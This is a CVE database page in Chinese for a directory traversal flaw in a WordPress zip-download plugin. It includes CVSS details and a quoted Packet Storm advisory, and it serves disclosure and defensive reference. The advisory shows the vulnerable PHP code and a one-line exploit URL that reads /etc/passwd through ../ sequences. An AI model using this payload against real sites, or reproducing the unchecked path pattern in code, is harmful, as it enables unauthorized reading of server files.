CVE-2015-4704
CVSS5.0
发布时间 :2017-05-23 00:29:00
修订时间 :2017-05-31 09:28:39
NMP    

[原文]Directory traversal vulnerability in the Download Zip Attachments plugin 1.0 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the File parameter to download.php.


[CNNVD]CNNVD数据暂缺。


[机译]帮助我们改进 Google 翻译

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-22 [对路径名的限制不恰当(路径遍历)]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4704
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4704
(官方数据源) NVD

- 其它链接及资源

http://packetstormsecurity.com/files/132459/Download-Zip-Attachments-1.0-File-Download.html
(VENDOR_ADVISORY)  MISC  http://packetstormsecurity.com/files/132459/Download-Zip-Attachments-1.0-File-Download.html
http://www.vapid.dhs.org/advisory.php?v=129
(VENDOR_ADVISORY)  MISC  http://www.vapid.dhs.org/advisory.php?v=129

- 漏洞信息 (F132459)

Download Zip Attachments 1.0 File Download (PacketStormID:F132459)
2015-06-26 00:00:00
Larry W. Cashdollar  
exploit,arbitrary
CVE-2015-4704
[点击下载]

Download Zip Attachments version 1.0 suffers from an arbitrary file download vulnerability.

Title: Remote file download vulnerability in download-zip-attachments v1.0
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-10
Download Site: https://wordpress.org/plugins/download-zip-attachments/
Vendor: rivenvirus
Vendor Notified: 2015-06-15
Vendor Contact: https://profiles.wordpress.org/rivenvirus/
Advisory: http://www.vapid.dhs.org/advisory.php?v=129
Description: 
Download all attachments from the post into a zip file.

Vulnerability:
from download-zip-attachments/download.php makes no checks to verify the download path is with in the specified upload directory.

<?php
if(isset($_REQUEST['File']) && !empty($_REQUEST['File'])){
  define('WP_USE_THEMES', false);
  require('../../../wp-load.php');    
  require "create_zip_file.php";
  $uploads = wp_upload_dir(); 
  $tmp_location = $uploads['path']."/".$_REQUEST['File'];
  //echo $tmp_location;
  $zip = new CreateZipFile;
  $zip->forceDownload($tmp_location,false);     
  unlink($tmp_location); 
  exit;
}

CVEID: 2015-4704
OSVDB:
Exploit Code:
	• http://www.example.com/wp-content/plugins/download-zip-attachments/download.php?File=../../../../../../../../etc/passwd


    
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站